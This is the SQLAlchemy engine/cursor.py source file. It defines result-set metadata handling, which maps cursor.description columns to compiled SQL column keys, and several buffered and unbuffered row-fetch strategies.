sqlalchemy/sqlalchemy
|
9d949c67c9b5396b1f33e7ff0f3230c81babf5be
|
b382bff6e3464f039db0fd1f2ce1b79038675e48
|
refs/heads/main
| 2023-08-31T17:40:59.565421
| 2023-08-30T15:01:41
| 2023-08-30T15:01:41
| 159,271,175
| 8,083
| 1,489
|
MIT
| 2023-09-12T18:53:55
| 2018-11-27T03:35:03
|
Python
|
UTF-8
|
Python
| false
| false
| 74,396
|
py
|
cursor.py
|
# engine/cursor.py
# Copyright (C) 2005-2023 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
# mypy: allow-untyped-defs, allow-untyped-calls
"""Define cursor-specific result set constructs including
:class:`.CursorResult`."""
from __future__ import annotations
import collections
import functools
import operator
import typing
from typing import Any
from typing import cast
from typing import ClassVar
from typing import Dict
from typing import Iterator
from typing import List
from typing import Mapping
from typing import NoReturn
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import TYPE_CHECKING
from typing import TypeVar
from typing import Union
from .result import IteratorResult
from .result import MergedResult
from .result import Result
from .result import ResultMetaData
from .result import SimpleResultMetaData
from .result import tuplegetter
from .row import Row
from .. import exc
from .. import util
from ..sql import elements
from ..sql import sqltypes
from ..sql import util as sql_util
from ..sql.base import _generative
from ..sql.compiler import ResultColumnsEntry
from ..sql.compiler import RM_NAME
from ..sql.compiler import RM_OBJECTS
from ..sql.compiler import RM_RENDERED_NAME
from ..sql.compiler import RM_TYPE
from ..sql.type_api import TypeEngine
from ..util import compat
from ..util.typing import Literal
from ..util.typing import Self
if typing.TYPE_CHECKING:
from .base import Connection
from .default import DefaultExecutionContext
from .interfaces import _DBAPICursorDescription
from .interfaces import DBAPICursor
from .interfaces import Dialect
from .interfaces import ExecutionContext
from .result import _KeyIndexType
from .result import _KeyMapRecType
from .result import _KeyMapType
from .result import _KeyType
from .result import _ProcessorsType
from .result import _TupleGetterType
from ..sql.type_api import _ResultProcessorType
_T = TypeVar("_T", bound=Any)
# metadata entry tuple indexes.
# using raw tuple is faster than namedtuple.
# these match up to the positions in
# _CursorKeyMapRecType
MD_INDEX: Literal[0] = 0
"""integer index in cursor.description
"""
MD_RESULT_MAP_INDEX: Literal[1] = 1
"""integer index in compiled._result_columns"""
MD_OBJECTS: Literal[2] = 2
"""other string keys and ColumnElement obj that can match.
This comes from compiler.RM_OBJECTS / compiler.ResultColumnsEntry.objects
"""
MD_LOOKUP_KEY: Literal[3] = 3
"""string key we usually expect for key-based lookup
this comes from compiler.RM_NAME / compiler.ResultColumnsEntry.name
"""
MD_RENDERED_NAME: Literal[4] = 4
"""name that is usually in cursor.description
this comes from compiler.RENDERED_NAME / compiler.ResultColumnsEntry.keyname
"""
MD_PROCESSOR: Literal[5] = 5
"""callable to process a result value into a row"""
MD_UNTRANSLATED: Literal[6] = 6
"""raw name from cursor.description"""
_CursorKeyMapRecType = Tuple[
Optional[int], # MD_INDEX, None means the record is ambiguously named
int, # MD_RESULT_MAP_INDEX
List[Any], # MD_OBJECTS
str, # MD_LOOKUP_KEY
str, # MD_RENDERED_NAME
Optional["_ResultProcessorType"], # MD_PROCESSOR
Optional[str], # MD_UNTRANSLATED
]
_CursorKeyMapType = Mapping["_KeyType", _CursorKeyMapRecType]
# same as _CursorKeyMapRecType except the MD_INDEX value is definitely
# not None
_NonAmbigCursorKeyMapRecType = Tuple[
int,
int,
List[Any],
str,
str,
Optional["_ResultProcessorType"],
str,
]
class CursorResultMetaData(ResultMetaData):
"""Result metadata for DBAPI cursors."""
__slots__ = (
"_keymap",
"_processors",
"_keys",
"_keymap_by_result_column_idx",
"_tuplefilter",
"_translated_indexes",
"_safe_for_cache",
"_unpickled",
"_key_to_index"
# don't need _unique_filters support here for now. Can be added
# if a need arises.
)
_keymap: _CursorKeyMapType
_processors: _ProcessorsType
_keymap_by_result_column_idx: Optional[Dict[int, _KeyMapRecType]]
_unpickled: bool
_safe_for_cache: bool
_translated_indexes: Optional[List[int]]
returns_rows: ClassVar[bool] = True
def _has_key(self, key: Any) -> bool:
return key in self._keymap
def _for_freeze(self) -> ResultMetaData:
return SimpleResultMetaData(
self._keys,
extra=[self._keymap[key][MD_OBJECTS] for key in self._keys],
)
def _make_new_metadata(
self,
*,
unpickled: bool,
processors: _ProcessorsType,
keys: Sequence[str],
keymap: _KeyMapType,
tuplefilter: Optional[_TupleGetterType],
translated_indexes: Optional[List[int]],
safe_for_cache: bool,
keymap_by_result_column_idx: Any,
) -> CursorResultMetaData:
new_obj = self.__class__.__new__(self.__class__)
new_obj._unpickled = unpickled
new_obj._processors = processors
new_obj._keys = keys
new_obj._keymap = keymap
new_obj._tuplefilter = tuplefilter
new_obj._translated_indexes = translated_indexes
new_obj._safe_for_cache = safe_for_cache
new_obj._keymap_by_result_column_idx = keymap_by_result_column_idx
new_obj._key_to_index = self._make_key_to_index(keymap, MD_INDEX)
return new_obj
def _remove_processors(self) -> CursorResultMetaData:
assert not self._tuplefilter
return self._make_new_metadata(
unpickled=self._unpickled,
processors=[None] * len(self._processors),
tuplefilter=None,
translated_indexes=None,
keymap={
key: value[0:5] + (None,) + value[6:]
for key, value in self._keymap.items()
},
keys=self._keys,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def _splice_horizontally(
self, other: CursorResultMetaData
) -> CursorResultMetaData:
assert not self._tuplefilter
keymap = dict(self._keymap)
offset = len(self._keys)
keymap.update(
{
key: (
# int index should be None for ambiguous key
value[0] + offset
if value[0] is not None and key not in keymap
else None,
value[1] + offset,
*value[2:],
)
for key, value in other._keymap.items()
}
)
return self._make_new_metadata(
unpickled=self._unpickled,
processors=self._processors + other._processors, # type: ignore
tuplefilter=None,
translated_indexes=None,
keys=self._keys + other._keys, # type: ignore
keymap=keymap,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx={
metadata_entry[MD_RESULT_MAP_INDEX]: metadata_entry
for metadata_entry in keymap.values()
},
)
def _reduce(self, keys: Sequence[_KeyIndexType]) -> ResultMetaData:
recs = list(self._metadata_for_keys(keys))
indexes = [rec[MD_INDEX] for rec in recs]
new_keys: List[str] = [rec[MD_LOOKUP_KEY] for rec in recs]
if self._translated_indexes:
indexes = [self._translated_indexes[idx] for idx in indexes]
tup = tuplegetter(*indexes)
new_recs = [(index,) + rec[1:] for index, rec in enumerate(recs)]
keymap = {rec[MD_LOOKUP_KEY]: rec for rec in new_recs}
# TODO: need unit test for:
# result = connection.execute("raw sql, no columns").scalars()
# without the "or ()" it's failing because MD_OBJECTS is None
keymap.update(
(e, new_rec)
for new_rec in new_recs
for e in new_rec[MD_OBJECTS] or ()
)
return self._make_new_metadata(
unpickled=self._unpickled,
processors=self._processors,
keys=new_keys,
tuplefilter=tup,
translated_indexes=indexes,
keymap=keymap, # type: ignore[arg-type]
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def _adapt_to_context(self, context: ExecutionContext) -> ResultMetaData:
"""When using a cached Compiled construct that has a _result_map,
for a new statement that used the cached Compiled, we need to ensure
the keymap has the Column objects from our new statement as keys.
So here we rewrite keymap with new entries for the new columns
as matched to those of the cached statement.
"""
if not context.compiled or not context.compiled._result_columns:
return self
compiled_statement = context.compiled.statement
invoked_statement = context.invoked_statement
if TYPE_CHECKING:
assert isinstance(invoked_statement, elements.ClauseElement)
if compiled_statement is invoked_statement:
return self
assert invoked_statement is not None
# this is the most common path for Core statements when
# caching is used. In ORM use, this codepath is not really used
# as the _result_disable_adapt_to_context execution option is
# set by the ORM.
# make a copy and add the columns from the invoked statement
# to the result map.
keymap_by_position = self._keymap_by_result_column_idx
if keymap_by_position is None:
# first retrival from cache, this map will not be set up yet,
# initialize lazily
keymap_by_position = self._keymap_by_result_column_idx = {
metadata_entry[MD_RESULT_MAP_INDEX]: metadata_entry
for metadata_entry in self._keymap.values()
}
assert not self._tuplefilter
return self._make_new_metadata(
keymap=compat.dict_union(
self._keymap,
{
new: keymap_by_position[idx]
for idx, new in enumerate(
invoked_statement._all_selected_columns
)
if idx in keymap_by_position
},
),
unpickled=self._unpickled,
processors=self._processors,
tuplefilter=None,
translated_indexes=None,
keys=self._keys,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def __init__(
self,
parent: CursorResult[Any],
cursor_description: _DBAPICursorDescription,
):
context = parent.context
self._tuplefilter = None
self._translated_indexes = None
self._safe_for_cache = self._unpickled = False
if context.result_column_struct:
(
result_columns,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
) = context.result_column_struct
num_ctx_cols = len(result_columns)
else:
result_columns = ( # type: ignore
cols_are_ordered
) = (
num_ctx_cols
) = (
ad_hoc_textual
) = loose_column_name_matching = textual_ordered = False
# merge cursor.description with the column info
# present in the compiled structure, if any
raw = self._merge_cursor_description(
context,
cursor_description,
result_columns,
num_ctx_cols,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
)
# processors in key order which are used when building up
# a row
self._processors = [
metadata_entry[MD_PROCESSOR] for metadata_entry in raw
]
# this is used when using this ResultMetaData in a Core-only cache
# retrieval context. it's initialized on first cache retrieval
# when the _result_disable_adapt_to_context execution option
# (which the ORM generally sets) is not set.
self._keymap_by_result_column_idx = None
# for compiled SQL constructs, copy additional lookup keys into
# the key lookup map, such as Column objects, labels,
# column keys and other names
if num_ctx_cols:
# keymap by primary string...
by_key = {
metadata_entry[MD_LOOKUP_KEY]: metadata_entry
for metadata_entry in raw
}
if len(by_key) != num_ctx_cols:
# if by-primary-string dictionary smaller than
# number of columns, assume we have dupes; (this check
# is also in place if string dictionary is bigger, as
# can occur when '*' was used as one of the compiled columns,
# which may or may not be suggestive of dupes), rewrite
# dupe records with "None" for index which results in
# ambiguous column exception when accessed.
#
# this is considered to be the less common case as it is not
# common to have dupe column keys in a SELECT statement.
#
# new in 1.4: get the complete set of all possible keys,
# strings, objects, whatever, that are dupes across two
# different records, first.
index_by_key: Dict[Any, Any] = {}
dupes = set()
for metadata_entry in raw:
for key in (metadata_entry[MD_RENDERED_NAME],) + (
metadata_entry[MD_OBJECTS] or ()
):
idx = metadata_entry[MD_INDEX]
# if this key has been associated with more than one
# positional index, it's a dupe
if index_by_key.setdefault(key, idx) != idx:
dupes.add(key)
# then put everything we have into the keymap excluding only
# those keys that are dupes.
self._keymap = {
obj_elem: metadata_entry
for metadata_entry in raw
if metadata_entry[MD_OBJECTS]
for obj_elem in metadata_entry[MD_OBJECTS]
if obj_elem not in dupes
}
# then for the dupe keys, put the "ambiguous column"
# record into by_key.
by_key.update(
{
key: (None, None, [], key, key, None, None)
for key in dupes
}
)
else:
# no dupes - copy secondary elements from compiled
# columns into self._keymap. this is the most common
# codepath for Core / ORM statement executions before the
# result metadata is cached
self._keymap = {
obj_elem: metadata_entry
for metadata_entry in raw
if metadata_entry[MD_OBJECTS]
for obj_elem in metadata_entry[MD_OBJECTS]
}
# update keymap with primary string names taking
# precedence
self._keymap.update(by_key)
else:
# no compiled objects to map, just create keymap by primary string
self._keymap = {
metadata_entry[MD_LOOKUP_KEY]: metadata_entry
for metadata_entry in raw
}
# update keymap with "translated" names. In SQLAlchemy this is a
# sqlite only thing, and in fact impacting only extremely old SQLite
# versions unlikely to be present in modern Python versions.
# however, the pyhive third party dialect is
# also using this hook, which means others still might use it as well.
# I dislike having this awkward hook here but as long as we need
# to use names in cursor.description in some cases we need to have
# some hook to accomplish this.
if not num_ctx_cols and context._translate_colname:
self._keymap.update(
{
metadata_entry[MD_UNTRANSLATED]: self._keymap[
metadata_entry[MD_LOOKUP_KEY]
]
for metadata_entry in raw
if metadata_entry[MD_UNTRANSLATED]
}
)
self._key_to_index = self._make_key_to_index(self._keymap, MD_INDEX)
def _merge_cursor_description(
self,
context,
cursor_description,
result_columns,
num_ctx_cols,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
):
"""Merge a cursor.description with compiled result column information.
There are at least four separate strategies used here, selected
depending on the type of SQL construct used to start with.
The most common case is that of the compiled SQL expression construct,
which generated the column names present in the raw SQL string and
which has the identical number of columns as were reported by
cursor.description. In this case, we assume a 1-1 positional mapping
between the entries in cursor.description and the compiled object.
This is also the most performant case as we disregard extracting /
decoding the column names present in cursor.description since we
already have the desired name we generated in the compiled SQL
construct.
The next common case is that of the completely raw string SQL,
such as passed to connection.execute(). In this case we have no
compiled construct to work with, so we extract and decode the
names from cursor.description and index those as the primary
result row target keys.
The remaining fairly common case is that of the textual SQL
that includes at least partial column information; this is when
we use a :class:`_expression.TextualSelect` construct.
This construct may have
unordered or ordered column information. In the ordered case, we
merge the cursor.description and the compiled construct's information
positionally, and warn if there are additional description names
present, however we still decode the names in cursor.description
as we don't have a guarantee that the names in the columns match
on these. In the unordered case, we match names in cursor.description
to that of the compiled construct based on name matching.
In both of these cases, the cursor.description names and the column
expression objects and names are indexed as result row target keys.
The final case is much less common, where we have a compiled
non-textual SQL expression construct, but the number of columns
in cursor.description doesn't match what's in the compiled
construct. We make the guess here that there might be textual
column expressions in the compiled construct that themselves include
a comma in them causing them to split. We do the same name-matching
as with textual non-ordered columns.
The name-matched system of merging is the same as that used by
SQLAlchemy for all cases up through the 0.9 series. Positional
matching for compiled SQL expressions was introduced in 1.0 as a
major performance feature, and positional matching for textual
:class:`_expression.TextualSelect` objects in 1.1.
As name matching is no longer
a common case, it was acceptable to factor it into smaller generator-
oriented methods that are easier to understand, but incur slightly
more performance overhead.
"""
if (
num_ctx_cols
and cols_are_ordered
and not textual_ordered
and num_ctx_cols == len(cursor_description)
):
self._keys = [elem[0] for elem in result_columns]
# pure positional 1-1 case; doesn't need to read
# the names from cursor.description
# most common case for Core and ORM
# this metadata is safe to cache because we are guaranteed
# to have the columns in the same order for new executions
self._safe_for_cache = True
return [
(
idx,
idx,
rmap_entry[RM_OBJECTS],
rmap_entry[RM_NAME],
rmap_entry[RM_RENDERED_NAME],
context.get_result_processor(
rmap_entry[RM_TYPE],
rmap_entry[RM_RENDERED_NAME],
cursor_description[idx][1],
),
None,
)
for idx, rmap_entry in enumerate(result_columns)
]
else:
# name-based or text-positional cases, where we need
# to read cursor.description names
if textual_ordered or (
ad_hoc_textual and len(cursor_description) == num_ctx_cols
):
self._safe_for_cache = True
# textual positional case
raw_iterator = self._merge_textual_cols_by_position(
context, cursor_description, result_columns
)
elif num_ctx_cols:
# compiled SQL with a mismatch of description cols
# vs. compiled cols, or textual w/ unordered columns
# the order of columns can change if the query is
# against a "select *", so not safe to cache
self._safe_for_cache = False
raw_iterator = self._merge_cols_by_name(
context,
cursor_description,
result_columns,
loose_column_name_matching,
)
else:
# no compiled SQL, just a raw string, order of columns
# can change for "select *"
self._safe_for_cache = False
raw_iterator = self._merge_cols_by_none(
context, cursor_description
)
return [
(
idx,
ridx,
obj,
cursor_colname,
cursor_colname,
context.get_result_processor(
mapped_type, cursor_colname, coltype
),
untranslated,
)
for (
idx,
ridx,
cursor_colname,
mapped_type,
coltype,
obj,
untranslated,
) in raw_iterator
]
def _colnames_from_description(self, context, cursor_description):
"""Extract column names and data types from a cursor.description.
Applies unicode decoding, column translation, "normalization",
and case sensitivity rules to the names based on the dialect.
"""
dialect = context.dialect
translate_colname = context._translate_colname
normalize_name = (
dialect.normalize_name if dialect.requires_name_normalize else None
)
untranslated = None
self._keys = []
for idx, rec in enumerate(cursor_description):
colname = rec[0]
coltype = rec[1]
if translate_colname:
colname, untranslated = translate_colname(colname)
if normalize_name:
colname = normalize_name(colname)
self._keys.append(colname)
yield idx, colname, untranslated, coltype
def _merge_textual_cols_by_position(
self, context, cursor_description, result_columns
):
num_ctx_cols = len(result_columns)
if num_ctx_cols > len(cursor_description):
util.warn(
"Number of columns in textual SQL (%d) is "
"smaller than number of columns requested (%d)"
% (num_ctx_cols, len(cursor_description))
)
seen = set()
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
if idx < num_ctx_cols:
ctx_rec = result_columns[idx]
obj = ctx_rec[RM_OBJECTS]
ridx = idx
mapped_type = ctx_rec[RM_TYPE]
if obj[0] in seen:
raise exc.InvalidRequestError(
"Duplicate column expression requested "
"in textual SQL: %r" % obj[0]
)
seen.add(obj[0])
else:
mapped_type = sqltypes.NULLTYPE
obj = None
ridx = None
yield idx, ridx, colname, mapped_type, coltype, obj, untranslated
def _merge_cols_by_name(
self,
context,
cursor_description,
result_columns,
loose_column_name_matching,
):
match_map = self._create_description_match_map(
result_columns, loose_column_name_matching
)
mapped_type: TypeEngine[Any]
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
try:
ctx_rec = match_map[colname]
except KeyError:
mapped_type = sqltypes.NULLTYPE
obj = None
result_columns_idx = None
else:
obj = ctx_rec[1]
mapped_type = ctx_rec[2]
result_columns_idx = ctx_rec[3]
yield (
idx,
result_columns_idx,
colname,
mapped_type,
coltype,
obj,
untranslated,
)
@classmethod
def _create_description_match_map(
cls,
result_columns: List[ResultColumnsEntry],
loose_column_name_matching: bool = False,
) -> Dict[
Union[str, object], Tuple[str, Tuple[Any, ...], TypeEngine[Any], int]
]:
"""when matching cursor.description to a set of names that are present
in a Compiled object, as is the case with TextualSelect, get all the
names we expect might match those in cursor.description.
"""
d: Dict[
Union[str, object],
Tuple[str, Tuple[Any, ...], TypeEngine[Any], int],
] = {}
for ridx, elem in enumerate(result_columns):
key = elem[RM_RENDERED_NAME]
if key in d:
# conflicting keyname - just add the column-linked objects
# to the existing record. if there is a duplicate column
# name in the cursor description, this will allow all of those
# objects to raise an ambiguous column error
e_name, e_obj, e_type, e_ridx = d[key]
d[key] = e_name, e_obj + elem[RM_OBJECTS], e_type, ridx
else:
d[key] = (elem[RM_NAME], elem[RM_OBJECTS], elem[RM_TYPE], ridx)
if loose_column_name_matching:
# when using a textual statement with an unordered set
# of columns that line up, we are expecting the user
# to be using label names in the SQL that match to the column
# expressions. Enable more liberal matching for this case;
# duplicate keys that are ambiguous will be fixed later.
for r_key in elem[RM_OBJECTS]:
d.setdefault(
r_key,
(elem[RM_NAME], elem[RM_OBJECTS], elem[RM_TYPE], ridx),
)
return d
def _merge_cols_by_none(self, context, cursor_description):
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
yield (
idx,
None,
colname,
sqltypes.NULLTYPE,
coltype,
None,
untranslated,
)
if not TYPE_CHECKING:
def _key_fallback(
self, key: Any, err: Optional[Exception], raiseerr: bool = True
) -> Optional[NoReturn]:
if raiseerr:
if self._unpickled and isinstance(key, elements.ColumnElement):
raise exc.NoSuchColumnError(
"Row was unpickled; lookup by ColumnElement "
"is unsupported"
) from err
else:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'"
% util.string_or_unprintable(key)
) from err
else:
return None
def _raise_for_ambiguous_column_name(self, rec):
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in "
"result set column descriptions" % rec[MD_LOOKUP_KEY]
)
def _index_for_key(self, key: Any, raiseerr: bool = True) -> Optional[int]:
# TODO: can consider pre-loading ints and negative ints
# into _keymap - also no coverage here
if isinstance(key, int):
key = self._keys[key]
try:
rec = self._keymap[key]
except KeyError as ke:
x = self._key_fallback(key, ke, raiseerr)
assert x is None
return None
index = rec[0]
if index is None:
self._raise_for_ambiguous_column_name(rec)
return index
def _indexes_for_keys(self, keys):
try:
return [self._keymap[key][0] for key in keys]
except KeyError as ke:
# ensure it raises
CursorResultMetaData._key_fallback(self, ke.args[0], ke)
def _metadata_for_keys(
self, keys: Sequence[Any]
) -> Iterator[_NonAmbigCursorKeyMapRecType]:
for key in keys:
if int in key.__class__.__mro__:
key = self._keys[key]
try:
rec = self._keymap[key]
except KeyError as ke:
# ensure it raises
CursorResultMetaData._key_fallback(self, ke.args[0], ke)
index = rec[MD_INDEX]
if index is None:
self._raise_for_ambiguous_column_name(rec)
yield cast(_NonAmbigCursorKeyMapRecType, rec)
def __getstate__(self):
# TODO: consider serializing this as SimpleResultMetaData
return {
"_keymap": {
key: (
rec[MD_INDEX],
rec[MD_RESULT_MAP_INDEX],
[],
key,
rec[MD_RENDERED_NAME],
None,
None,
)
for key, rec in self._keymap.items()
if isinstance(key, (str, int))
},
"_keys": self._keys,
"_translated_indexes": self._translated_indexes,
}
def __setstate__(self, state):
self._processors = [None for _ in range(len(state["_keys"]))]
self._keymap = state["_keymap"]
self._keymap_by_result_column_idx = None
self._key_to_index = self._make_key_to_index(self._keymap, MD_INDEX)
self._keys = state["_keys"]
self._unpickled = True
if state["_translated_indexes"]:
self._translated_indexes = cast(
"List[int]", state["_translated_indexes"]
)
self._tuplefilter = tuplegetter(*self._translated_indexes)
else:
self._translated_indexes = self._tuplefilter = None
class ResultFetchStrategy:
"""Define a fetching strategy for a result object.
.. versionadded:: 1.4
"""
__slots__ = ()
alternate_cursor_description: Optional[_DBAPICursorDescription] = None
def soft_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
raise NotImplementedError()
def hard_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
raise NotImplementedError()
def yield_per(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
num: int,
) -> None:
return
def fetchone(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
hard_close: bool = False,
) -> Any:
raise NotImplementedError()
def fetchmany(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
size: Optional[int] = None,
) -> Any:
raise NotImplementedError()
def fetchall(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
) -> Any:
raise NotImplementedError()
def handle_exception(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
err: BaseException,
) -> NoReturn:
raise err
class NoCursorFetchStrategy(ResultFetchStrategy):
"""Cursor strategy for a result that has no open cursor.
There are two varieties of this strategy, one for DQL and one for
DML (and also DDL), each of which represent a result that had a cursor
but no longer has one.
"""
__slots__ = ()
def soft_close(self, result, dbapi_cursor):
pass
def hard_close(self, result, dbapi_cursor):
pass
def fetchone(self, result, dbapi_cursor, hard_close=False):
return self._non_result(result, None)
def fetchmany(self, result, dbapi_cursor, size=None):
return self._non_result(result, [])
def fetchall(self, result, dbapi_cursor):
return self._non_result(result, [])
def _non_result(self, result, default, err=None):
raise NotImplementedError()
class NoCursorDQLFetchStrategy(NoCursorFetchStrategy):
"""Cursor strategy for a DQL result that has no open cursor.
This is a result set that can return rows, i.e. for a SELECT, or for an
INSERT, UPDATE, DELETE that includes RETURNING. However it is in the state
where the cursor is closed and no rows remain available. The owning result
object may or may not be "hard closed", which determines if the fetch
methods send empty results or raise for closed result.
"""
__slots__ = ()
def _non_result(self, result, default, err=None):
if result.closed:
raise exc.ResourceClosedError(
"This result object is closed."
) from err
else:
return default
_NO_CURSOR_DQL = NoCursorDQLFetchStrategy()
class NoCursorDMLFetchStrategy(NoCursorFetchStrategy):
"""Cursor strategy for a DML result that has no open cursor.
This is a result set that does not return rows, i.e. for an INSERT,
UPDATE, DELETE that does not include RETURNING.
"""
__slots__ = ()
def _non_result(self, result, default, err=None):
# we only expect to have a _NoResultMetaData() here right now.
assert not result._metadata.returns_rows
result._metadata._we_dont_return_rows(err)
_NO_CURSOR_DML = NoCursorDMLFetchStrategy()
class CursorFetchStrategy(ResultFetchStrategy):
"""Call fetch methods from a DBAPI cursor.
Alternate versions of this class may instead buffer the rows from
cursors or not use cursors at all.
"""
__slots__ = ()
def soft_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
result.cursor_strategy = _NO_CURSOR_DQL
def hard_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
result.cursor_strategy = _NO_CURSOR_DQL
def handle_exception(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
err: BaseException,
) -> NoReturn:
result.connection._handle_dbapi_exception(
err, None, None, dbapi_cursor, result.context
)
def yield_per(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
num: int,
) -> None:
result.cursor_strategy = BufferedRowCursorFetchStrategy(
dbapi_cursor,
{"max_row_buffer": num},
initial_buffer=collections.deque(),
growth_factor=0,
)
def fetchone(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
hard_close: bool = False,
) -> Any:
try:
row = dbapi_cursor.fetchone()
if row is None:
result._soft_close(hard=hard_close)
return row
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
def fetchmany(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
size: Optional[int] = None,
) -> Any:
try:
if size is None:
l = dbapi_cursor.fetchmany()
else:
l = dbapi_cursor.fetchmany(size)
if not l:
result._soft_close()
return l
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
def fetchall(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
) -> Any:
try:
rows = dbapi_cursor.fetchall()
result._soft_close()
return rows
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
_DEFAULT_FETCH = CursorFetchStrategy()
class BufferedRowCursorFetchStrategy(CursorFetchStrategy):
"""A cursor fetch strategy with row buffering behavior.
This strategy buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
The pre-fetching behavior fetches only one row initially, and then
grows its buffer size by a fixed amount with each successive need
for additional rows up the ``max_row_buffer`` size, which defaults
to 1000::
with psycopg2_engine.connect() as conn:
result = conn.execution_options(
stream_results=True, max_row_buffer=50
).execute(text("select * from table"))
.. versionadded:: 1.4 ``max_row_buffer`` may now exceed 1000 rows.
.. seealso::
:ref:`psycopg2_execution_options`
"""
__slots__ = ("_max_row_buffer", "_rowbuffer", "_bufsize", "_growth_factor")
def __init__(
self,
dbapi_cursor,
execution_options,
growth_factor=5,
initial_buffer=None,
):
self._max_row_buffer = execution_options.get("max_row_buffer", 1000)
if initial_buffer is not None:
self._rowbuffer = initial_buffer
else:
self._rowbuffer = collections.deque(dbapi_cursor.fetchmany(1))
self._growth_factor = growth_factor
if growth_factor:
self._bufsize = min(self._max_row_buffer, self._growth_factor)
else:
self._bufsize = self._max_row_buffer
@classmethod
def create(cls, result):
return BufferedRowCursorFetchStrategy(
result.cursor,
result.context.execution_options,
)
def _buffer_rows(self, result, dbapi_cursor):
"""this is currently used only by fetchone()."""
size = self._bufsize
try:
if size < 1:
new_rows = dbapi_cursor.fetchall()
else:
new_rows = dbapi_cursor.fetchmany(size)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
if not new_rows:
return
self._rowbuffer = collections.deque(new_rows)
if self._growth_factor and size < self._max_row_buffer:
self._bufsize = min(
self._max_row_buffer, size * self._growth_factor
)
def yield_per(self, result, dbapi_cursor, num):
self._growth_factor = 0
self._max_row_buffer = self._bufsize = num
def soft_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().soft_close(result, dbapi_cursor)
def hard_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().hard_close(result, dbapi_cursor)
def fetchone(self, result, dbapi_cursor, hard_close=False):
if not self._rowbuffer:
self._buffer_rows(result, dbapi_cursor)
if not self._rowbuffer:
try:
result._soft_close(hard=hard_close)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
return None
return self._rowbuffer.popleft()
def fetchmany(self, result, dbapi_cursor, size=None):
if size is None:
return self.fetchall(result, dbapi_cursor)
buf = list(self._rowbuffer)
lb = len(buf)
if size > lb:
try:
new = dbapi_cursor.fetchmany(size - lb)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
else:
if not new:
result._soft_close()
else:
buf.extend(new)
result = buf[0:size]
self._rowbuffer = collections.deque(buf[size:])
return result
def fetchall(self, result, dbapi_cursor):
try:
ret = list(self._rowbuffer) + list(dbapi_cursor.fetchall())
self._rowbuffer.clear()
result._soft_close()
return ret
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
class FullyBufferedCursorFetchStrategy(CursorFetchStrategy):
"""A cursor strategy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
after the database conversation can not be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
__slots__ = ("_rowbuffer", "alternate_cursor_description")
def __init__(
self, dbapi_cursor, alternate_description=None, initial_buffer=None
):
self.alternate_cursor_description = alternate_description
if initial_buffer is not None:
self._rowbuffer = collections.deque(initial_buffer)
else:
self._rowbuffer = collections.deque(dbapi_cursor.fetchall())
def yield_per(self, result, dbapi_cursor, num):
pass
def soft_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().soft_close(result, dbapi_cursor)
def hard_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().hard_close(result, dbapi_cursor)
def fetchone(self, result, dbapi_cursor, hard_close=False):
if self._rowbuffer:
return self._rowbuffer.popleft()
else:
result._soft_close(hard=hard_close)
return None
def fetchmany(self, result, dbapi_cursor, size=None):
if size is None:
return self.fetchall(result, dbapi_cursor)
buf = list(self._rowbuffer)
rows = buf[0:size]
self._rowbuffer = collections.deque(buf[size:])
if not rows:
result._soft_close()
return rows
def fetchall(self, result, dbapi_cursor):
ret = self._rowbuffer
self._rowbuffer = collections.deque()
result._soft_close()
return ret
class _NoResultMetaData(ResultMetaData):
__slots__ = ()
returns_rows = False
def _we_dont_return_rows(self, err=None):
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically."
) from err
def _index_for_key(self, keys, raiseerr):
self._we_dont_return_rows()
def _metadata_for_keys(self, key):
self._we_dont_return_rows()
